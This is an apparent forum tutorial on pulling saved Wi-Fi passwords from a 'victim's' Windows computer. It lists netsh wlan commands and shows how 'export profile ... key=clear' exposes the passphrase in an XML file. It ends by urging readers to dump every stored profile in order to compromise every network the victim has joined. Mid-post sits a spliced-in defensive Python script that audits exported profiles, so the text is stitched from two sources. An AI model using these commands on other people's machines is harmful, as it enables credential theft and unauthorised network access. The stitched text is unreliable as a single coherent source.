Hack a Router password
Ever have physical access to a computer and want to know the router password? Ever have access to the Windows command line on a victim's computer and want to know their router password? Try using netsh, a very powerful network utility built into Windows Vista and 7.
Here's a little of what it can do:
Code:
netsh wlan show interfaces
This command shows the wireless interfaces connected to your computer. It's the same as iwconfig in Linux.
Code:
netsh wlan show drivers
This command shows the drivers of your wireless interfaces. This is sometimes useful if this is your own computer, but other than that not really.
Code:
netsh wlan show networks
This command shows all of the networks in connection range of your wireless card. It's similar to iwlist in Linux.
Code:
netsh wlan show profile
This command shows the profiles of networks that you have connected to before.
Code:
netsh wlan delete profile "profilename"
Use this if you want to delete a profile that you've connected to before.
Code:
netsh wlan show profile "profilename"
This shows some of the network settings that the profile specifies.
Code:
netsh wlan connect name="profilename"
This will connect your wireless interface to the network of the profile you specify.
Here's how you find the wireless key of a network that the host has connected to:
Code:
netsh wlan export profile name="profilename" key=clear
This will export the profile into an XML document. You can open that up in your internet browser or in Notepad. It will export in windows/system32/wireless network connection-profilename.
If you don't type key=clear, the key will be encrypted.
Once you open up your profile, it will look like this:
Code:
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>Test Network</name>
  <SSIDConfig>
    <SSID>
      <hex>74657374206E6574776F726B</hex>
      <name>Test Network</name>
    </SSID>
    <nonBroadcast>false</nonBroadcast>
  </SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <autoSwitch>false</autoSwitch>
  <MSM>
    <security>
      <authEncryption>
        <authentication>WPAPSK</authentication>
        <encryption>TKIP</encryption>
        <useOneX>false</useOneX>
      </authEncryption>
      <sharedKey>
        <keyType>passPhrase</keyType>
        <protected>false</protected>
        <keyMaterial>PasswordHere</keyMaterial>
      </sharedKey>
    </security>
  </MSM>
</WLANProfile>
Notice the <keyMaterial>PasswordHere</keyMaterial> element. That's where your password will be located.
Not bad for the Windows command line, huh?
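For the defender's side of the export format shown above, here is an added example (not from the original post): a Python audit that reads exported profile XML and reports whether the key sits in the file in clear text and whether the profile uses deprecated settings, without ever returning the key. The function names, the constructed sample profile and the choice of which values count as weak or legacy are assumptions of this example.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

NS = {"w": "http://www.microsoft.com/networking/WLAN/profile/v1"}
# Constructed sample in the shape of the export shown above (not a real profile).
SAMPLE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>Test Network</name>
  <MSM><security>
    <authEncryption>
      <authentication>WPAPSK</authentication>
      <encryption>TKIP</encryption>
    </authEncryption>
    <sharedKey>
      <protected>false</protected>
      <keyMaterial>PasswordHere</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>"""

def audit_profile(xml_data):
    """Return (profile name, findings); the key itself is never returned."""
    root = ET.fromstring(xml_data)  # accepts str or raw bytes read from a file
    def text(path):
        # Prefix every path step with the WLAN profile namespace; None if absent.
        return root.findtext("w:" + path.replace("/", "/w:"), "", NS).strip() or None
    findings = []
    # protected=false with keyMaterial present: the passphrase is readable as-is.
    key = "MSM/security/sharedKey/"
    if text(key + "protected") == "false" and text(key + "keyMaterial"):
        findings.append("cleartext key in file")
    enc = text("MSM/security/authEncryption/encryption")
    if enc in ("WEP", "TKIP"):
        findings.append("weak encryption: " + enc)
    auth = text("MSM/security/authEncryption/authentication")
    if auth in ("open", "shared", "WPA", "WPAPSK"):
        findings.append("legacy authentication: " + auth)
    return text("name"), findings

def audit_folder(folder):
    """Audit every *.xml file in a folder; files that are not valid XML are skipped."""
    results = {}
    for path in sorted(Path(folder).glob("*.xml")):
        try:
            results[path.name] = audit_profile(path.read_bytes())
        except ET.ParseError:
            continue
    return results

if __name__ == "__main__":
    print(audit_profile(SAMPLE))
```

Any file flagged with "cleartext key in file" is a leftover export that should be deleted, and the passphrase it contains should be rotated.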
Now take it a step further: how about dumping every profile with key=clear on a victim's computer and compromising every network that the victim has ever connected to with one script? You could write your own script to do so. It wouldn't be too hard to write a simple batch file that exports all of the wireless profiles at once in clear text, but why reinvent the wheel? There are scripts out there already; you just have to look for them.